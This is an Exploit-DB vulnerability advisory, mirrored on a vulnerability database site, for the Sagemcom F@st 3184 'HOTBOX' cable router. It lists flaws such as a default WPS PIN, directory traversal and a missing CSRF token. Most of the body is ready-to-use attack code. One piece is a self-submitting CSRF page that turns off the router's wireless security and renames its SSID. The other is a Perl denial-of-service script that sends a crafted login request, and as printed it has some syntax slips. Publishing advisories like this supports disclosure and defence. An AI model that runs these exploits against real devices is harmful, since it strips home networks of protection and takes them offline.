Lucene search
K

Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities

🗓️ 08 Nov 2013 00:00:00Reported by Oz ElisyanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 87 Views

HOT Cable communication HOTBOX router/modem F@st 3184 Multiple Vulnerabilities CVE-2013-503

Code
+------------------------------------------------------------------------------+
| HOTBOX is the leading router/modem appliance of      |
|  HOT Cable communication company in israel.           |
| The Appliance is manufactured by SAGEMCOM         |
| and carries the model name F@st 3184.                     |
+------------------------------------------------------------------------------+
| Title: HOTBOX Multiple Vulnerabilities                         |
+--------------------+---------------------------------------------------------+
| Release Date       | 2013/09/09                                    |
| Researcher         | Oz Elisyan                                     |
+--------------------+---------------------------------------------------------+
| System Affected    | HOTBOX Router/Modem               |
| Versions Affected  | 2.1.11 , possibly earlier                 |
| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|
| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218,       |
| CVE-2013-5039                                                         |
| Vendor Patched | N/A                                                 |
| Classification     | 0-day                                              |
| Exploits | http://elisyan.com/hotboxDoS.pl,                  |
| http://elisyan.com/hotboxCSRF.html                           |
+--------------------+---------------------------------------------------------+

Vulnerabilities List -
# Default WPS Pin
# Authentication based on IP Address
# DoS via crafted POST
# Path/Directory Traversal
# Script injection via DHCP request
# No CSRF Token

Demo -
http://www.youtube.com/watch?v=CPlT09ZIj48



CSRF EXPLOIT: 


<html>
    <form action='http://192.168.1.1/goform/wlanBasicSecurity' method='POST' id=1>
        <input type=hidden name="WirelessMacAddr" value="C0%3AAC%3A54%3AF8%3A67%3A58" id="WirelessMacAddr">
        <input type=hidden name="WirelessEnable1" value="1" id="WirelessEnable1">
    <input type=hidden name="ServiceSetIdentifier1" value="Elisyan" id="ServiceSetIdentifier1">
    <input type=hidden name="WirelessVendorMode" value="3" id="WirelessVendorMode">
    <input type=hidden name="ChannelNumber1" value="0" id="ChannelNumber1">
    <input type=hidden name="NBandwidth1" value="20" id="NBandwidth1">
    <input type=hidden name="ClosedNetwork1" value="0" id="ClosedNetwork1">
    <input type=hidden name="WifiSecurity" value="0" id="WifiSecurity">
    <input type=hidden name="commitwlanBasicSecurity" value="1" id="commitwlanBasicSecurity">
    <input type=hidden name="restoreWirelessDefaults1" value="0" id="restoreWirelessDefaults1">
    <input type=hidden name="scanActions1" value="0" id="scanActions1">
    <input type=hidden name="AutoSecurity1" value="1" id="AutoSecurity1">
    <input type=hidden name="wpsActions1" value="0" id="wpsActions1">
    

    </form>
</html>
<script>document.getElementById(1).submit();</script>



DENIAL OF SERVICE EXPLOIT:

use warnings;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;


# Author: Oz Elisyan
# Date: 3 September 2013
# Affected Version: <= 2.1.11

print "# HOTBOX DoS PoC #\n\n"

unless ($ARGV[0]){
  print "Please Enter Valid Host Name.\n";
  exit();
}

print "Sending Evil POST request...\n";

my $HOST = $ARGV[0];
my $URL = "http://$HOST/goform/login";
my $PostData = "loginUsername=aaaloginPassword=aaa"
my $browser = LWP::UserAgent->new();
my $req = HTTP::Request->new(POST => $URL);
$req->content_type("application/x-www-form-urlencoded");
$req->content($PostData);
my $resp = $browser->request($req);

print "Done.";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Nov 2013 00:00Current
6.4Medium risk
Vulners AI Score6.4
87